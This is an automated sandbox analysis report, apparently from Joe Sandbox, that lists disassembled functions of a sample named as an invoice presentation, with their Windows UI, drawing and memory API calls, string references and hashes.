Instruction Fuzzy Hash: F021CF31200711EFEA213B61DC48BA6BBEDFB54756F00416AF156DB7A0EB70D840CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BDE03B, Relevance: 13.6, APIs: 9, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00BDE055
GetWindowLongA.USER32 ref: 00BDE064
IsWindowEnabled.USER32(00000000), ref: 00BDE072
GetDlgItem.USER32 ref: 00BDE088
GetWindowLongA.USER32 ref: 00BDE093
IsWindowEnabled.USER32(00000000), ref: 00BDE0A1
GetFocus.USER32 ref: 00BDE0BF
IsWindowEnabled.USER32(00000000), ref: 00BDE0C6
SetFocus.USER32(00000000), ref: 00BDE0D1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Enabled$FocusItemLong
String ID:
API String ID: 1558694495-0
Opcode ID: 7be510d12c85dab2de4fa973cb0652c4757656a7fa05944a1d2a19145609742c
Instruction ID: ca57daf8b8e81065af120a20b874e1212966a7a6317299ef94f098797b3d5dec
Opcode Fuzzy Hash: 7be510d12c85dab2de4fa973cb0652c4757656a7fa05944a1d2a19145609742c
Instruction Fuzzy Hash: 2211D331201315EFDB253F649C49AAEBBA9FF45355B000252F915E73B0EB608815CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C007ED, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C007F4

Part of subcall function 00BA39F5: __EH_prolog3.LIBCMT ref: 00BA39FC
Part of subcall function 00BA39F5: _strlen.LIBCMT ref: 00BA3A37

_strlen.LIBCMT ref: 00C00825
_strlen.LIBCMT ref: 00C0083A
_strlen.LIBCMT ref: 00C0088F
__fassign.LIBCMT ref: 00C00913
__fassign.LIBCMT ref: 00C00974

Strings

AMP, xrefs: 00C00AE8

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$H_prolog3__fassign
String ID: AMP
API String ID: 193058888-2695192153
Opcode ID: 0d90dd7fd2168faa19252c2ecdf483559e29d9ef67e328f74ee7a8e37ae6dac8
Instruction ID: d260c494ad089425e3a7b7aa496ebd7c0b1ebbe82fe86e0ff93fdad6ccbef5af
Opcode Fuzzy Hash: 0d90dd7fd2168faa19252c2ecdf483559e29d9ef67e328f74ee7a8e37ae6dac8
Instruction Fuzzy Hash: 40918A70A04219AFDF04EBA8C896BEDB7B5AF49710F14406CF511B72C2CBB46E45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BEE622, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00BEE66C
SetRectEmpty.USER32 ref: 00BEE68B

Part of subcall function 00BB4678: SetBkMode.GDI32(?,?), ref: 00BB468C
Part of subcall function 00BB4678: SetBkMode.GDI32(?,?), ref: 00BB469E

__EH_prolog3_GS.LIBCMT ref: 00BEE6A0
InflateRect.USER32(?,000000FF,000000FE), ref: 00BEE830
OffsetRect.USER32(?,00000000,000000FE), ref: 00BEE83E
OffsetRect.USER32(?,00000001,00000001), ref: 00BEE852

Strings

..., xrefs: 00BEE858

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$ModeOffset$EmptyH_prolog3_InflateWindow
String ID: ...
API String ID: 3827798281-440645147
Opcode ID: 428f97b8ebba12a4593646bebef6466e1cc1adb8b4a59be02a76374bc2041c48
Instruction ID: ca7051ee1c9bda7ad1c31cbe6502c461d73b7f7815319ecc202a002abd64703c
Opcode Fuzzy Hash: 428f97b8ebba12a4593646bebef6466e1cc1adb8b4a59be02a76374bc2041c48
Instruction Fuzzy Hash: 76812835A00618DFDF14DF69C885AEEBBF6FF88310F184159E926A7290DB74AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA064, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 216libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 00BBA087
GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 00BBA0BC
GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 00BBA0E4
ScreenToClient.USER32 ref: 00BBA174

Strings

user32.dll, xrefs: 00BBA07D
GetGestureInfo, xrefs: 00BBA0AE
CloseGestureInfoHandle, xrefs: 00BBA0D6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressProc$ClientHandleModuleScreen
String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
API String ID: 471820996-2905070798
Opcode ID: b9ce5afb8b676217992d0214b0b3e9136bd0736f12f7cd5f2894ae75683afa25
Instruction ID: ee325f510c20f6022eecc3e059f3013e873e9f7c1374ae105e893c494279dd95
Opcode Fuzzy Hash: b9ce5afb8b676217992d0214b0b3e9136bd0736f12f7cd5f2894ae75683afa25
Instruction Fuzzy Hash: 2B818D75A00616EFCB15CF69D984AB9BBF1FB09310B0042A9E845E3760DBB1ED64CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC9BB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFC9C2
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,00000078), ref: 00BFC9DE
SHGetDesktopFolder.SHELL32(?,00000000,00000000,?,00000078), ref: 00BFC9EF
GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00BFCA08
SendMessageA.USER32 ref: 00BFCACA
SendMessageA.USER32(00000001,00001102,00000002,00000000), ref: 00BFCADB

Strings

g, xrefs: 00BFCA01

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: FolderMessageSend$AllocDesktopGlobalH_prolog3LocationSpecial
String ID: g
API String ID: 4238072464-30677878
Opcode ID: 58a0805db9d2d6e806c196c9af8e487547fa90f10b22265646c88c4d70fa64df
Instruction ID: 846089ce64aca6e6a04f6f2569538b85cbd1f0b8ad2437acde422ad4ff8ea6d3
Opcode Fuzzy Hash: 58a0805db9d2d6e806c196c9af8e487547fa90f10b22265646c88c4d70fa64df
Instruction Fuzzy Hash: FA413A75A00219DFDF009F68CC89BAEBBB5FF49710F100169E605EB391CB70A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BFCEA1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000004,?), ref: 00BFCEE7
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BFCF21
SendMessageA.USER32(?,00001102,00008001,?), ref: 00BFCF63

Part of subcall function 00BFC6D4: __EH_prolog3.LIBCMT ref: 00BFC6DB
Part of subcall function 00BFC6D4: SendMessageA.USER32(?,0000110C,00000000,?), ref: 00BFC71D

SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00BFCFA7

Strings

@, xrefs: 00BFCF06

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$H_prolog3
String ID: @
API String ID: 1885053084-2766056989
Opcode ID: 3de46be4c962141a6e4c5757400b5aa8692d9e30d7a31e85b28413ed485f61d4
Instruction ID: 24227e39bbdadf1791e14d6af104948c3166e525b3a7418b48b8449965760001
Opcode Fuzzy Hash: 3de46be4c962141a6e4c5757400b5aa8692d9e30d7a31e85b28413ed485f61d4
Instruction Fuzzy Hash: 3731AF35A0020CBBEA119B55DD49EEABFADEB08B61F004150F701A75A0D6B0DD888BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BF41C4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF41CE

Part of subcall function 00BF5141: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BF514A

SendMessageA.USER32(?,00000030,?,00000001), ref: 00BF4234
SendMessageA.USER32(?,000000D4,00000000,00000000), ref: 00BF4245
SendMessageA.USER32(?,00000030,?,00000001), ref: 00BF426D
SendMessageA.USER32(?,000000D4,00000000,00000000), ref: 00BF4279
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00BF4299

Strings

d, xrefs: 00BF41F0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$ContextExternal$BaseBase::~Concurrency::details::H_prolog3_
String ID: d
API String ID: 1047725533-2564639436
Opcode ID: 4a337185bddcc9d0d18ebe24be3ecd83a8ab8a59531af0cd3d81e3b992e5b94c
Instruction ID: abe62f1696c418048faf3054a2e9a9954b888e9c09de3050c638a9b7b6c305d5
Opcode Fuzzy Hash: 4a337185bddcc9d0d18ebe24be3ecd83a8ab8a59531af0cd3d81e3b992e5b94c
Instruction Fuzzy Hash: A0214C74A10218DFEB21ABA5DC44BEEBBF8FF95704F0001A9F605A7291DB745A44CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C5A1EE, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C5A1F5

Part of subcall function 00BA39F5: __EH_prolog3.LIBCMT ref: 00BA39FC
Part of subcall function 00BA39F5: _strlen.LIBCMT ref: 00BA3A37

_strlen.LIBCMT ref: 00C5A24F

Strings

AQUA_, xrefs: 00C5A23B
BLACK_, xrefs: 00C5A242, 00C5A24E, 00C5A256
BLUE_, xrefs: 00C5A249
IDX_OFFICE2007_STYLE, xrefs: 00C5A205
SILVER_, xrefs: 00C5A234

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3_strlen
String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
API String ID: 782648989-2717817858
Opcode ID: b0dd8f1f2bb0679ff15d160f13fb0a42ac12e31868680dda1b3d49b6fec4660a
Instruction ID: 12e3860af93462da77a535d6fa96eedb0a075d15a6e2c7037723280c8cfb5467
Opcode Fuzzy Hash: b0dd8f1f2bb0679ff15d160f13fb0a42ac12e31868680dda1b3d49b6fec4660a
Instruction Fuzzy Hash: 2511B676900005DBCB00EFA9CD46EFE7775EF80311F144255B82967289D6719A88C766

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1027, Relevance: 12.2, APIs: 8, Instructions: 183windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD69D3: PeekMessageA.USER32 ref: 00BD6A09

PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BB1073

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$PeekPost
String ID:
API String ID: 3896666515-0
Opcode ID: dc89bf7ed9aa88af60627b9b6a0cfacf3771dccb3ebf49ee16723e02b59eeb2f
Instruction ID: 9008d68d33268695b45dfa302d42f7c27b8853299626ba1d23679ea183813a13
Opcode Fuzzy Hash: dc89bf7ed9aa88af60627b9b6a0cfacf3771dccb3ebf49ee16723e02b59eeb2f
Instruction Fuzzy Hash: 7C51E535300611EBDB162728AC88FFEB7E9EFC4761F0901A6F905DB391EF609C0186A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C04498, Relevance: 12.2, APIs: 8, Instructions: 152windowCOMMON

Download Yara Rule

APIs

CopyRect.USER32 ref: 00C044F2

Part of subcall function 00C02B6B: __EH_prolog3_GS.LIBCMT ref: 00C02B72
Part of subcall function 00C02B6B: CreateCompatibleDC.GDI32(00000000), ref: 00C02BAA
Part of subcall function 00C02B6B: CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 00C02C33

DestroyIcon.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C04535
PatBlt.GDI32(00000000,00000000,00FF0060,?,00FF0062), ref: 00C04586
SetBkColor.GDI32(?), ref: 00C045AC
BitBlt.GDI32(00000000,00000000,?,00000000,?,00000000,Function_00130020,?,?), ref: 00C045D4
SetBkColor.GDI32(?), ref: 00C045EE
BitBlt.GDI32(00000000,00000000,00EE0086,00000000,?,00000000,00EE0086,?,?), ref: 00C04616
BitBlt.GDI32(00000000,00000001,00000001,008800C7,?,00000000,00000000,00000000,008800C6), ref: 00C0463E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ColorCreate$CompatibleCopyDestroyH_prolog3_IconRectSection
String ID:
API String ID: 2460415571-0
Opcode ID: 402459d0eca07bbc727d3c6a942ef4aa375818826890cca072424c381a725f2e
Instruction ID: 5fe67bae42cee33267837b7db8fd9e293f8149abb91d96fda7ba35b593cd290a
Opcode Fuzzy Hash: 402459d0eca07bbc727d3c6a942ef4aa375818826890cca072424c381a725f2e
Instruction Fuzzy Hash: D7519D71500305EFDB349FA9DD85EABBBBDEB85700B004519F626E72A0CB70E904DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2CDB, Relevance: 12.1, APIs: 8, Instructions: 116memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BC2CE2
EnterCriticalSection.KERNEL32(?,00000010,00BC2BE8,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000,00000000), ref: 00BC2CF3
TlsGetValue.KERNEL32(?,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000,00000000,?,?,?), ref: 00BC2D0F
LocalAlloc.KERNEL32(00000000,00000000,00000010,?,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000,00000000), ref: 00BC2D77
LocalReAlloc.KERNEL32(?,00000000,00000002,00000010,?,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000,00000000), ref: 00BC2D8C
TlsSetValue.KERNEL32(?,00000000), ref: 00BC2DBD
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,?,00D595F0,00B90000,00000000,00000000,?,?,?), ref: 00BC2DDB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterH_prolog3_catchLeave
String ID:
API String ID: 1707010094-0
Opcode ID: 58b3fe9ea01d89c26ba9bf8f1548eeec16dc62e1b9742fc6e2910392f69f8216
Instruction ID: b782c22f5e2ead0e88db2f79ecdf877c0401e96b3238b4961a68ef70b30e97e7
Opcode Fuzzy Hash: 58b3fe9ea01d89c26ba9bf8f1548eeec16dc62e1b9742fc6e2910392f69f8216
Instruction Fuzzy Hash: 0D41AB71900701DFCB259F18D885E6ABBF5FF60320B1485AEE85ADB351DB30E840CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2EA0, Relevance: 12.1, APIs: 8, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00BF2EE2
InvalidateRect.USER32(?,00000000,00000001), ref: 00BF2F25
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00BF2F80
GetParent.USER32(?), ref: 00BF2F8F
SendMessageA.USER32(?,00000111,?,?), ref: 00BF2FC1
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00BF2FE1
UpdateWindow.USER32(?), ref: 00BF2FEA
ReleaseCapture.USER32 ref: 00BF2FF9

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID:
API String ID: 2465089168-0
Opcode ID: b434a332ae1a9893cc368dc79371ad2caee134b912df879ab1c6d93d8377955e
Instruction ID: 32654ee861b0497064c07a154831f3299172e4428cd72aceb366da9ae2d38616
Opcode Fuzzy Hash: b434a332ae1a9893cc368dc79371ad2caee134b912df879ab1c6d93d8377955e
Instruction Fuzzy Hash: E5410071A1470AFFDB089F75D884ABAFBF5FB08300F10426AE519A3661DB746914CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BE0435, Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE043C
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00BE0480
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BE04A9
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BE0500
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000004), ref: 00BE0510
GetParent.USER32(?), ref: 00BE0551
GetParent.USER32(?), ref: 00BE0564
SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00BE057B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$Parent$H_prolog3RedrawWindow
String ID:
API String ID: 2708892647-0
Opcode ID: b2185be0a4b5de04feb5395ed9ab5ec19dc1de910d263618fd1f5d63a76bc5af
Instruction ID: 71eba1377a8184c78c89e79642b02f05b3b2d8af132784219a1a8fa462659d6e
Opcode Fuzzy Hash: b2185be0a4b5de04feb5395ed9ab5ec19dc1de910d263618fd1f5d63a76bc5af
Instruction Fuzzy Hash: D531A030710751EBDF256B62CC99BEE7FE6EF44310F000264B9099B2A1DBB18890CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C804E6, Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

APIs

ScreenToClient.USER32 ref: 00C80502
GetParent.USER32(?), ref: 00C80519
GetClientRect.USER32 ref: 00C8055D
MapWindowPoints.USER32 ref: 00C8056F
PtInRect.USER32(?,?,?), ref: 00C8057F
GetClientRect.USER32 ref: 00C805AC
MapWindowPoints.USER32 ref: 00C805BE
PtInRect.USER32(?,?,?), ref: 00C805CE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Client$PointsWindow$ParentScreen
String ID:
API String ID: 1944725958-0
Opcode ID: 2b8be7983b7f92df7065c73cd1212f353cbc1a756b2b422bf1e356113c33d717
Instruction ID: 5c217e67aace22a54893da4d6824f374700bd2b9840b5842d221f85703dacf2f
Opcode Fuzzy Hash: 2b8be7983b7f92df7065c73cd1212f353cbc1a756b2b422bf1e356113c33d717
Instruction Fuzzy Hash: F6315072900219EFDF41AFA4CC449EE7BB9FF48304B200125E946E7260EB31DE04DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC90AF, Relevance: 12.1, APIs: 8, Instructions: 77COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 00BC90D3
ClientToScreen.USER32(?,?), ref: 00BC90EE
GetWindow.USER32(?,00000005), ref: 00BC90F7
GetDlgCtrlID.USER32(00000000), ref: 00BC9107
GetWindowLongA.USER32 ref: 00BC9117
GetWindowRect.USER32 ref: 00BC9135
PtInRect.USER32(?,?,?), ref: 00BC9145
GetWindow.USER32(00000000,00000002), ref: 00BC9154

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
